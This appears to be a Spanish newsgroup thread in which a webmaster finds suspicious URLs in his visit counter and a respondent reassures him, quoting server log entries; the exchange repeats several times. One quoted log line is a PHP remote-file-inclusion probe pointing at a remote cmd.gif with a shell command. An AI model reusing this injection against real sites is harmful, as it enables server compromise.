Hola

Tengo hecho en mi sitio un simple registro de visitas por página. Es decir
que cada vez que alguien consulta una determinada página, busco en la tabla
el nombre y le sumo 1 visita.

Es decir que la tabla sólo debería contener estos datos:
Home 200
Servicios 20
Trabajos 70

Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
(le quito una parte de la dirección y la pongo entre paréntesis para quienes
les interese investigar, porque yo entré a una y me detectó un virus: El
php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)

http://62.129.173.149/img/xxxx (dog.c?)
http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo
http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)

Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

BIGOTE escribió:
> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
> (le quito una parte de la dirección y la pongo entre paréntesis para quienes
> les interese investigar, porque yo entré a una y me detectó un virus: El
> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN IDEA)
> http://62.129.173.149/img/xxxx (dog.c?)
> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo

Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
servidores hacen un escaneo de seguridad a las personas que las visitan.
Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
he recibido un scan de puertos, una comprobación de open relay para
correos o incluso de páginas web.

Es una práctica desagradable, pero existe (aunque hace ya meses que no
he entrado en una web así .

> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque el
> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que el
> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
> completa (con el cmd1.txt) pero no cuando escribí el dominio aeronautics.ru.

No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
porque han realizado un simple rastreo de seguridad a tu servidor.

Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
servidor y te sorprenderías al conocer la frecuencia de esas visitas:

2006-11-17 02-56-44 prxjdg.adstatserver.com
http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
MSIE 6.01; Windows NT 5.0) 218.204.1
00.170 - -
2006-11-20 02-22-26 213.96.187.217
//phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
Mozilla/4.0 (compati
ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
2006-11-27 17-45-37 www.spedia.net
http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
Win2000) 217.159.171.203 - -
2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
64.124.222.168 - -
2006-12-05 06-35-41 umsky.com
http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
(compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
- -

Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
suele repetirse muchas veces el mismo a lo largo de varios días).

> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer llegar.


De nada.

Un saludo y tranquilo

--
Óscar Javier García Baudet
LinaresDigital
http://redstar.linaresdigital.com/

Genial, gracias Oscar.


"Oscar Garcia" <redstarQUITARSPAM23***terra.es> escribió en el mensaje
news:f0uuc1$3r2$1***cormoran.emeteo.local...
> BIGOTE escribió:
>> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
>> (le quito una parte de la dirección y la pongo entre paréntesis para
>> quienes
>> les interese investigar, porque yo entré a una y me detectó un virus: El
>> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN
>> IDEA)
>> http://62.129.173.149/img/xxxx (dog.c?)
>> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo
>
> Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
> servidores hacen un escaneo de seguridad a las personas que las visitan.
> Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
> he recibido un scan de puertos, una comprobación de open relay para
> correos o incluso de páginas web.
>
> Es una práctica desagradable, pero existe (aunque hace ya meses que no
> he entrado en una web así .
>
>> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
>> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque
>> el
>> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que
>> el
>> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
>> completa (con el cmd1.txt) pero no cuando escribí el dominio
>> aeronautics.ru.
>
> No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
> porque han realizado un simple rastreo de seguridad a tu servidor.
>
> Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
> servidor y te sorprenderías al conocer la frecuencia de esas visitas:
>
> 2006-11-17 02-56-44 prxjdg.adstatserver.com
> http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
> MSIE 6.01; Windows NT 5.0) 218.204.1
> 00.170 - -
> 2006-11-20 02-22-26 213.96.187.217
> //phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
> Mozilla/4.0 (compati
> ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
> 2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
> 2006-11-27 17-45-37 www.spedia.net
> http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
> Win2000) 217.159.171.203 - -
> 2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
> 2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
> 64.124.222.168 - -
> 2006-12-05 06-35-41 umsky.com
> http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
> (compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
> - -
>
> Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
> suele repetirse muchas veces el mismo a lo largo de varios días).
>
>> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer
>> llegar.
>
>
> De nada.
>
> Un saludo y tranquilo
>
> --
> Óscar Javier García Baudet
> LinaresDigital
> http://redstar.linaresdigital.com/

Genial, gracias Oscar.


"Oscar Garcia" <redstarQUITARSPAM23***terra.es> escribió en el mensaje
news:f0uuc1$3r2$1***cormoran.emeteo.local...
> BIGOTE escribió:
>> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
>> (le quito una parte de la dirección y la pongo entre paréntesis para
>> quienes
>> les interese investigar, porque yo entré a una y me detectó un virus: El
>> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN
>> IDEA)
>> http://62.129.173.149/img/xxxx (dog.c?)
>> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo
>
> Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
> servidores hacen un escaneo de seguridad a las personas que las visitan.
> Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
> he recibido un scan de puertos, una comprobación de open relay para
> correos o incluso de páginas web.
>
> Es una práctica desagradable, pero existe (aunque hace ya meses que no
> he entrado en una web así .
>
>> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
>> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque
>> el
>> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que
>> el
>> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
>> completa (con el cmd1.txt) pero no cuando escribí el dominio
>> aeronautics.ru.
>
> No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
> porque han realizado un simple rastreo de seguridad a tu servidor.
>
> Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
> servidor y te sorprenderías al conocer la frecuencia de esas visitas:
>
> 2006-11-17 02-56-44 prxjdg.adstatserver.com
> http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
> MSIE 6.01; Windows NT 5.0) 218.204.1
> 00.170 - -
> 2006-11-20 02-22-26 213.96.187.217
> //phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
> Mozilla/4.0 (compati
> ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
> 2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
> 2006-11-27 17-45-37 www.spedia.net
> http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
> Win2000) 217.159.171.203 - -
> 2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
> 2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
> 64.124.222.168 - -
> 2006-12-05 06-35-41 umsky.com
> http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
> (compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
> - -
>
> Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
> suele repetirse muchas veces el mismo a lo largo de varios días).
>
>> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer
>> llegar.
>
>
> De nada.
>
> Un saludo y tranquilo
>
> --
> Óscar Javier García Baudet
> LinaresDigital
> http://redstar.linaresdigital.com/

Genial, gracias Oscar.


"Oscar Garcia" <redstarQUITARSPAM23***terra.es> escribió en el mensaje
news:f0uuc1$3r2$1***cormoran.emeteo.local...
> BIGOTE escribió:
>> Pero hoy al consultarla, me encuentro con los enlaces que pongo más abajo
>> (le quito una parte de la dirección y la pongo entre paréntesis para
>> quienes
>> les interese investigar, porque yo entré a una y me detectó un virus: El
>> php.backdoor. Así que NO INTENTEN ENTRAR SI SON COMO YO QUE NO TIENEN
>> IDEA)
>> http://62.129.173.149/img/xxxx (dog.c?)
>> http://aeronautics.ru/xxxxxxxxx (cmd1.txt) -> aquí entré yo
>
> Posiblemente fuera una comprobación inversa debido a tu visita. Algunos
> servidores hacen un escaneo de seguridad a las personas que las visitan.
> Es muy poco frecuente pero a mí me ha pasado que tras visitar una página
> he recibido un scan de puertos, una comprobación de open relay para
> correos o incluso de páginas web.
>
> Es una práctica desagradable, pero existe (aunque hace ya meses que no
> he entrado en una web así .
>
>> http://alls.net/unfz/t00lz/cmdtool25/xxxxxx (tool25.dat)
>> Mi pregunta es: ¿Tengo un virus en el servidor?, ¿cómo lo saco?, porque
>> el
>> antivirus lo que hizo, cuando entré al segundo enlace, fue avisarme que
>> el
>> virus se instaló en mi disco, y lo hizo sólo cuando puse la dirección
>> completa (con el cmd1.txt) pero no cuando escribí el dominio
>> aeronautics.ru.
>
> No, no lo tienes. Esas visitas es porque otra persona tiene ese virus o
> porque han realizado un simple rastreo de seguridad a tu servidor.
>
> Yo uso un sistema de historial de visitas "a dominios no alojados" en mi
> servidor y te sorprenderías al conocer la frecuencia de esas visitas:
>
> 2006-11-17 02-56-44 prxjdg.adstatserver.com
> http://prxjdg.adstatserver.com/cgi-bin/ip.cgi Mozilla/4.0 (compatible;
> MSIE 6.01; Windows NT 5.0) 218.204.1
> 00.170 - -
> 2006-11-20 02-22-26 213.96.187.217
> //phplive//help.php?css_path=http://209.183.158.227/phplive/.../cmd.gif?&cmd=echo;which%20w;echo
> Mozilla/4.0 (compati
> ble; MSIE 6.0; Windows 98) 216.75.55.81 - -
> 2006-11-22 20-07-10 mx3.mail2000.com.tw:25 61.229.139.104 - -
> 2006-11-27 17-45-37 www.spedia.net
> http://www.spedia.net/sp_login.htm Mozilla/5.0 (compatible; MSIE 5.01;
> Win2000) 217.159.171.203 - -
> 2006-11-24 11-08-52 p2.mumu.pp.ru http://p2.mumu.pp.ru/index.htm
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) 218.150.108.168 - -
> 2006-11-27 23-49-29 http://widejournal.com/pj/env2.php
> 64.124.222.168 - -
> 2006-12-05 06-35-41 umsky.com
> http://umsky.com/prxn.php?p=q1w2e3r4t5y6u7i8o9p0*a-b Mozilla/4.0
> (compatible; MSIE 6.01; Windows NT 5.0) 218.204.100.170
> - -
>
> Y un largo etcétera (te he puesto sólo un ejemplo de cada tipo aunque
> suele repetirse muchas veces el mismo a lo largo de varios días).
>
>> Desde ya muchas gracias por cualquier sugerencia que me puedan hacer
>> llegar.
>
>
> De nada.
>
> Un saludo y tranquilo
>
> --
> Óscar Javier García Baudet
> LinaresDigital
> http://redstar.linaresdigital.com/